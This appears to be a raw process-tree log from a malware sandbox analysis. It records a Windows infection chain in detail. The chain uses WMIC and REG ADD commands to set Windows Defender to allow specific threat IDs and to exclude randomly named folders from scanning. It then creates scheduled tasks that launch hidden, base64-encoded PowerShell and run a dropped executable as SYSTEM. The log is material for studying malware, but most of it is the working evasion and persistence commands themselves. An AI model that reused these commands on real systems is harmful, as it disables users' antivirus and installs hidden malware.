forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1040

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:64

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2576

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:4036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2352

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:2368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:2676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1176

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:3044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3564

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2504

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3904

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3712

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:64

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:32
3⤵
PID:2700

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:64
3⤵
PID:2692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:32
3⤵
PID:3408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:64
3⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:32
3⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:64
3⤵
PID:2252

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPkddrXyI" /SC once /ST 03:00:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1748

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPkddrXyI"
2⤵
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gPkddrXyI"
2⤵
PID:1628

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 02:41:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ZNIZXhj.exe\" gh /site_id 767 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1284

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
2⤵
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:628

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3936

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2504

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2664

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ZNIZXhj.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\ZNIZXhj.exe gh /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:1124

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2252

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2944

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3516

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1716

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1680

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1832

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4020

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2900

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
2⤵
PID:3740

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:2304

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3680

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:2004

C:\Windows\SysWOW64\schtasks.exe
